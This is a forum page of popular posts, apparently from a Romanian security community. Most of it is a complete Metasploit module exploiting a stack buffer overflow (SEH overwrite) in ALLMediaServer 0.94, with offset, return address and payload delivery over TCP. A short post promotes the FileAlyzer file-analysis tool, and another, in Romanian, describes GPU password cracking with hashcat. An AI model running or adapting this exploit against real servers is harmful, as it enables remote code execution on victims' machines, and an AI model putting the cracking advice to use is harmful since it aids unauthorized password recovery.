Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 03/29/13 in all areas

  1. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # [url=http://metasploit.com/framework/]Penetration Testing Software | Metasploit[/url] ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote #Rank definition: [url=http://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking]Exploit Ranking - Metasploit Framework - Metasploit Redmine Interface[/url] #ManualRanking/LowRanking/AverageRanking/NormalRanking/GoodRanking/GreatRanking/ExcellentRanking Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'ALLMediaServer 0.94 Buffer Overflow Exploit', 'Description' => %q{ This module exploits a stack buffer overflow in ALLMediaServer 0.94. The vulnerability is caused due to a boundary error within the handling of HTTP request. }, 'License' => MSF_LICENSE, 'Author' => [ 'metacom<metacom27[at]gmail.com>', # Original discovery '<metacom>', # MSF Module 'RST', ], 'References' => [ [ 'OSVDB', '<insert OSVDB number here>' ], [ 'CVE', 'insert CVE number here' ], [ 'URL', 'http://www.bugsearch.net/en/14147/allmediaserver-094-seh-overflow-exploit.html' ] ], 'DefaultOptions' => { 'ExitFunction' => 'process', #none/process/thread/seh #'InitialAutoRunScript' => 'migrate -f', }, 'Platform' => 'win', 'Payload' => { 'BadChars' => "\x00", # <change if needed> 'DisableNops' => true, }, 'Targets' => [ [ 'Windows 7',# Tested on: Windows 7 SP1/SP0 { 'Ret' => 0x65EC24CA, # pop eax # pop ebx # ret - avcodec-53.dll 'Offset' => 1065 } ], ], 'Privileged' => false, #Correct Date Format: "M D Y" #Month format: Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec 'DisclosureDate' => 'Mar 28 2013', 'DefaultTarget' => 0)) register_options([Opt::RPORT(888)], self.class) end def exploit connect buffer = "http://" buffer << rand_text(target['Offset']) #junk buffer << generate_seh_record(target.ret) buffer << payload.encoded #3931 bytes of space # more junk may be needed to trigger the exception print_status("Sending payload to ALLMediaServer on #{target.name}...") sock.put(buffer) handler disconnect end end
    1 point
  2. FileAlyzer is a tool to analyze files – the name itself was initially just a typo of FileAnalyzer, but after a few days I decided to keep it. FileAlyzer allows a basic analysis of files (showing file properties and file contents in hex dump form) and is able to interpret common file contents like resources structures (like text, graphics, HTML, media and PE). Using FileAlyzer is as simple as viewing the regular properties of a file – just right-click the file you want to analyze and choose Open in FileAlyzer. Download: http://www.spybotupdates.com/files/filealyz-2.0.5.57.exe md5: D670C0B28E93941AD2FFB774DB271486 Home page: FileAlyzer | Spybot © ™ - Search & Destroy
    1 point
  3. <sorelian, poti sa dai ceva detalii, te rog?> Da , pot. Dar doar foarte superficial. Nu doresc sa intru in amanunte...netul e mare si google iti sta la dispozitie. Placile grafice ATI si nVidia ,pot fi puse la lucru cu ajutorul lui HASHCAT si unele drivere specifice. Viteza de procesare pe GPU e de zece ori mai mare decat pe CPU. Deci , daca cu ajutorul procesorului , un dictionar de 1 giga il parcurgi in 20 de ore , ei...cu ajutorul placii grafice il poti parcurge in max 2 ore. Cred ca ajunge....
    1 point
×
×
  • Create New...